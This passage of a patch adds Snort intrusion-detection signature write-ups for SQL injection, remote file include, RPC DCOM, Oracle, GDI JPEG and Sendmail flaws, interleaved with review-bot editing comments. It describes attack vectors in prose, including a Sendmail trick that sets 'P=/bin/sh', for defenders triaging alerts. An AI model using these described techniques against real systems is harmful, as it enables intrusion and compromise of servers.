+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
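Review bot: like the generic CGI entries, this one never says what the rule matches; 'a known vulnerability on a web server or a web application' and 'the attack scenarios are legion' could be attached to any web sid. The Summary should name the request pattern sid 1091 detects so an analyst can tell this alert from the others. 'attackers choosing' under Impact needs the possessive.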
--- /dev/null
+++ b/doc/signatures/100000544.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000544
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "search.php" with SQL commands being passed as the "relationship" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "relationship" parameter in the "search.php" script used 
+by the "Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
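Review bot: same template problems as 100000519.txt: no blank line before the separator after the Sid value, after Affected Systems and after Contributors, an extra blank line after the final separator, and the generic CGI credential-validation paragraph placed after the specific SQL injection description although it describes a different weakness. 'exploitation attempt has been attempted' is redundant, 'ona web server' should be 'on a web server', and 'attackers choosing' needs the possessive.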
--- /dev/null
+++ b/doc/signatures/478.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+
+Sid:
+478
+
+--
+
+Summary:
+This event is generated when Broadscan Smurf Scanner generates an ICMP echo
+request message.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+The Broadscan Smurf Scanner generates an ICMP echo packet with a specific
+datagram signature.  
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  Packet generation tools can generate this type of ICMP packet
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP echo requests with
+user-defined payloads.  This could allow attackers to replace this
+signature with binary values and conceal their operating system.
+
+--
+
+Corrective Action:
+To prevent information gathering, use a firewall to block incoming ICMP
+Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+
+
+--
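Review bot: the Affected Systems section is missing; the entry jumps from Detailed Information to Attack Scenarios, while every other entry in the patch carries the section. Detailed Information says the scanner produces 'a specific datagram signature' without saying what it is; the entry should describe the payload the rule keys on, since that is exactly what False Negatives says an attacker can alter. The False Negatives text says altering the payload lets attackers 'conceal their operating system', but the rule identifies a scanning tool, not an operating system; it should say 'conceal the tool in use'. 'None known' and 'this type of ICMP packet' lack periods, the contributor e-mail is in parentheses rather than the angle brackets used elsewhere, and the double blank lines around each separator differ from the other files.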
--- /dev/null
+++ b/doc/signatures/3328.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3328
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
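Review bot: fourth verbatim copy of the 3186.txt text in this patch, with the same Attack Scenarios/Detailed Information mismatch (network-share filename versus malformed RPC DCOM request), the 'Expoit' typo and an empty Additional References section. State in the Summary what distinguishes sid 3328 from the other RPC DCOM sids, and fix the shared text in every copy.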
--- /dev/null
+++ b/doc/signatures/1511.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1511
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
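Review bot: neither the Summary nor the Detailed Information in 1511.txt names the CGI script or request pattern the rule matches, so an analyst reading this entry cannot tell what triggered the event; add the target script to the Summary. Also fix "ona" to "on a" in Detailed Information and "attackers choosing" to "attacker's choosing", and note that Additional References is empty.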
--- /dev/null
+++ b/doc/signatures/2832.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2832
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure do_deferred_repcat_admin
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
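Review bot: the Affected Systems entry in 2832.txt reads "Oracle Oracle9i" (duplicated word), and the sentence naming the vulnerable procedure is split with its period orphaned onto the next line ("do_deferred_repcat_admin" / ". This procedure is included in"); join it into one sentence. Additional References is empty even though a specific procedure in sys.dbms_repcat_mas is named; add the vendor alert and CVE entry.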
--- /dev/null
+++ b/doc/signatures/1691.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1691
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
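Review bot: the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell..." in the Detailed Information of 1691.txt does not belong to an Oracle command rule and reads as pasted from a telnet signature; remove or reword it. The Attack Scenarios entry ("Simple. These are Oracle database commands.") answers Ease of Attack rather than describing a scenario, the variable is written both as "$ORACLE_PORTS" and "ORACLE_PORTS" (use one spelling), and the second Corrective Action sentence is missing its final period.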
--- /dev/null
+++ b/doc/signatures/1101.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1101
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
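Review bot: the Detailed Information in 1101.txt is entirely generic and never says which request or resource the rule matches; name it so analysts can triage the event. "attackers choosing" in Impact should be "attacker's choosing", and Additional References is empty.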
--- /dev/null
+++ b/doc/signatures/100000623.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000623
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "menu.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "menu.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
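Review bot: the Attack Scenarios in 100000623.txt describe credential supply and privilege escalation, not the remote file include via the "admin_template_path" parameter of "menu.php" that the Summary describes, and the third Detailed Information paragraph (credential validation boilerplate) is likewise unrelated to a file include; trim both to the file-include vector. Fix "ona" to "on a" and "attackers choosing" to "attacker's choosing", add the blank line before "--" after Affected Systems so the separators match the other sections, and note that Additional References is empty.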
--- /dev/null
+++ b/doc/signatures/3364.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3364
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
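Review bot: 3364.txt is a verbatim copy of the RPC DCOM text earlier in this patch and carries the same problems: the Attack Scenarios (overly long filename via a network share) do not match the malformed RPC request described in Detailed Information, "Expoit" should be "Exploit", and Additional References is empty. If sid 3364 detects a different condition from the other RPC DCOM rule, the Detailed Information should say how the two differ.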
--- /dev/null
+++ b/doc/signatures/100000422.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000422
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpBB" application running on a webserver. Access to the file "template.php" using a remote file being passed as the "page" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "page" parameter in the "template.php" script used by the "phpBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBB
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
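Review bot: the Attack Scenarios and the third Detailed Information paragraph in 100000422.txt describe credential supply and privilege escalation rather than the remote file include via the "page" parameter of "template.php" that the Summary describes; trim them to the file-include vector. Fix "ona" to "on a" and "attackers choosing" to "attacker's choosing"; Additional References is empty.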
--- /dev/null
+++ b/doc/signatures/421.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+421
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Reply datagram.
+
+--
+
+Impact:
+ICMP Mobile Registration Reply were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 36 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Reply datagrams were developed before the approval of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 36 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
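Review bot: the Impact section in 421.txt ("ICMP Mobile Registration Reply were never implemented...") restates the Detailed Information instead of describing impact and needs "Replies were"; the Detailed Information says these datagrams "should never be seen" but does not say why seeing one matters to a defender. The Affected Systems section present in the other entries is missing here, the Corrective Action sentence lacks its final period, and Additional References says "None" although RFC3344 is cited in the text; list it.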
--- /dev/null
+++ b/doc/signatures/2705.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+2705
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
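Review bot: the Impact line in 2705.txt ends with a comma ("Denial of Service (DoS),"), and "have the use attempt to view the file" under Attack Scenarios should read "have the user attempt". The Affected Systems entry ("All Microsoft systems including multiple Microsoft products") is too vague to act on; list the affected products or versions. The "WARNING ... WARNING" wrapper around the flow_depth note is a layout none of the other entries use; a single sentence on the performance cost of flow_depth 0 would read better. Additional References is empty.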
--- /dev/null
+++ b/doc/signatures/2084.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2084
+
+--
+Summary:
+xfsmd
+
+--
+Impact:
+Possible root access and code execution.
+
+--
+Detailed Information:
+It is possible for an attacker to exploit some versions of the xfsmd 
+daemon.
+
+Due to a programming error, the service does not correctly check for 
+certain meta-characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
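Review bot: the Summary in 2084.txt is just "xfsmd" rather than a description of the event; write it as a sentence like the other entries. "Uprade" under Corrective Action should be "Upgrade" and that sentence lacks its period; Attack Scenarios ("Exploits are widely available.") states ease rather than a scenario, and the Detailed Information never says what the unstripped meta-characters allow, which the Impact line ("root access and code execution") implies.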
--- /dev/null
+++ b/doc/signatures/819.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+819
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
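Review bot: 819.txt repeats the 1511.txt text word for word without naming the CGI script this sid matches; add the specific target to the Summary so the two entries can be told apart. Fix "ona" to "on a" and "attackers choosing" to "attacker's choosing"; Additional References is empty.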
--- /dev/null
+++ b/doc/signatures/669.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+669
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where linefeed characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of linefeed characters in commands passed from ident to Sendmail. An attacker can use a specially crafted command with linefeeds in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with linefeed characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
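Review bot: the Attack Scenarios in 669.txt ("An attacker sends an email with linefeed characters and includes a path variable of P=/bin/sh") disagrees with the Detailed Information, which says the crafted data arrives in an ident response to Sendmail rather than in an email; align the two. Otherwise this entry is in good shape: the affected versions, references and the timing constraint under Ease of Attack are all specific.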
--- /dev/null
+++ b/doc/signatures/100000826.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000826
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Phorum" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "mode" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "mode" parameter in the "search.php" script used by the "Phorum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Phorum
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
